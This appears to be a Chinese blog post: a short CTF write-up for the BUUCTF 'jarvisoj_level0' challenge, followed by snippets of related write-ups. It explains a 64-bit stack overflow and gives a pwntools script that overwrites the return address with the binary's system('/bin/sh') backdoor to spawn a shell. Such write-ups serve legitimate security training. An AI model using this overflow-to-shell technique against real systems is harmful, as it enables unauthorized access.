BUUCTF jarvisoj_level0

最新推荐文章于 2025-12-09 16:28:13 发布
原创 最新推荐文章于 2025-12-09 16:28:13 发布 · 575 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#安全
文章是关于一个缓冲区溢出漏洞的利用技术,主要涉及64位程序中的ebp等于8的条件,以及如何通过构造payload覆盖返回地址,使其指向sys函数的地址来触发系统调用。利用模板编写了exploit代码,包括发送payload到程序以执行特定操作。

小白垃圾做题笔记而已,不建议阅读。。。

这道题感觉主要就是64位程序ebp=8

题目中给出了shellcode

我们直接将返回地址覆盖就好。

在main函数中调用了vulnerable_function()函数。 

vulnerable函数是一个漏洞函数:(存在缓溢出),我们只需要将buf溢出到返回地址,返回地址覆盖为sys函数地址即可。

 

exp:这里用下大佬的模板。

from pwn import *

debug=1
if debug:
    p=process('./level0')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    pause()
#    gdb.attach(p)
else:
    p=remote('')

def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)


sys_add=0x040059A


payload='a'*0x88+p64(sys_add)
ru(' World\n')
se(payload)

p.interactive()
 

ok

 

jarvisoj_level0
weixin_56301399的博客
07-21 717
在Functionswindow可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,且callsystem()函数的起始地址为0x400596。双击vulnerable_function()函数可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。buf需覆盖0x80个字节覆盖,再加上rbp的0x8个字节,最后加上callsystem()函数的起始地址0x400596构成payload。信息就了解他是64位即可。...
[buuctf]jarvisoj_level0
逆向萌新的博客
05-30 659
[buuctf]jarvisoj_level0
buuctf中的jarvisoj_level0
最新发布
2301_79485835的博客
12-09 471
pwn解题wp
buuctf-jarvisoj_level0(pwn)题解
2301_81574836的博客
02-18 696
buuctf-jarvisoj_level0(pwn)题解
buuctfjarvisoj_level0
weixin_54452942的博客
03-28 1885
64位(system_addr+1)的奥秘
jarvis oj level0
发蝴蝶和大脑斧的博客
12-01 1034
菜鸟入门,先从level0开始下手。 首先checksec,发现开启了nx保护。 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 拖进64位ida,查看vulnerable_function ssize_t...
[BUUCTF]PWN8——jarvisoj_level0
mcmuyanga的博客
08-26 713
[BUUCTF]PWN8——jarvisoj_level0 题目网址:https://buuoj.cn/challenges#jarvisoj_level0 步骤: 例行检查,64位,开启了NX保护 nc一下,看看程序的大概执行流程,回显Hello,world之后让我们输入 用64位ida打开,shift+f12查看字符串,发现了 system 和 /bin/sh 双击跟进,ctrl+x找到调用 /bin/sh 的函数,找到了程序里的后门,shell_addr=0x400596 根据
BUUCTF jarvisoj_level0 wp
AEJL叁的博客,欢迎关注!
09-17 2432
显示除了NX保护均未开启或完全启用 ,说明此题难度系数不高,而NX开启说明数据区域(如栈、堆)不可执行,是防止将写入数据区后跳转执行,所以可优先考虑不利用shellcode注入且简单直接的方式寻找漏洞。main函数的伪C代码提示调用了函数,那么接下来可以进入 vulnerable_function 函数进行分析。(对于write函数的调用,我们放到后续分析)10xDuLL0xD\n函数中使用了read函数:0: 文件描述符。​,通常来自键盘输入或程序重定向bufbuf0x200uLL0x200这是。
BUUCTF[jarvisoj_level0]
2501_92612816的博客
12-06 166
checksec使用ida打开,主函数没有什么东西,于是跳转另一个函数发现有read函数并且没有开启栈溢出保护,因此这道题就是简单的一道栈溢出此处可写入0x200个字节,但是buf缓冲区只能存储0x80个字节,足够溢出了查找发现存在后面函数编写脚本溢出覆盖返回地址即可。
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 545
Buu CTF PWN题jarvisoj_level0的WriteUp
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 5134
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
PWN-题解
2301_79215333的博客
02-20 1126
检查文件,64位,开启NX保护拖入IDA打开,查看主函数双击查看可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。在Functions window可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,存在system(“/bin/sh”)即使用栈溢出令返回地址指向该函数地址即可。
jarvis oj---level0解题方法
weixin_45427676的博客
09-29 422
题目场景: nc pwn2.jarvisoj.com 9881 level0.b9ded3801d6dd36a97468e128b81a65d 解题 在虚拟机里打开终端,输入命令“checksec"查看有没有什么保护机制 checksec之后发现有NX保护 将文件用IDA打开,F5键查看main函数,发现使用了vulnerable_function()函数,双击查看函数 read可以读入0x2...
jarvisoj_level0解题
suyuany的博客
02-04 422
F5键查看main函数,发现使用了vulnerable_function()函数,双击查看函数。从buf到vulnerable_function的返回地址只有0x80+0x8。有"/bin/sh",调用了system()函数。查看callsystem()函数。read可以读入0x200。起始地址为400596。
jarvisOJ-level0
qq_35661990的博客
09-28 414
jarvisOJ上的题目梯度似乎比pwnable.tw上的题目更合理点,pwnable.kr目前做的十几题都是考察各种基础,只有少数像pwn题。 level0是考最基础的ROP 先把下载的文件放进IDA里看看 .text:00000000004005C6 main proc near ; DATA XREF: _start+1D↑o .te...
buuoj jarvisoj_level0 writeup
m0_73605862的博客
05-30 333
Step4:查看vulnerable_function()函数,发现buf定义了80个字节,猜测是栈溢出漏洞,然后查找一下后门函数。Step5:shift+F12查看字符串,发现/bin/sh,点击进去查看,然后shift+x,查看地址为0x400596。Step6:编写exp,输入以后,ls查看文件,发现有一个flag.txt文件,cat 查看文件,得到flag。【来源】(buuoj)https://buuoj.cn/challenges#jarvisoj_level0
BUUCTF pwn——level0
CNS-Enterprise BCC-1701-J
03-12 288
BUUCTF 做题练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值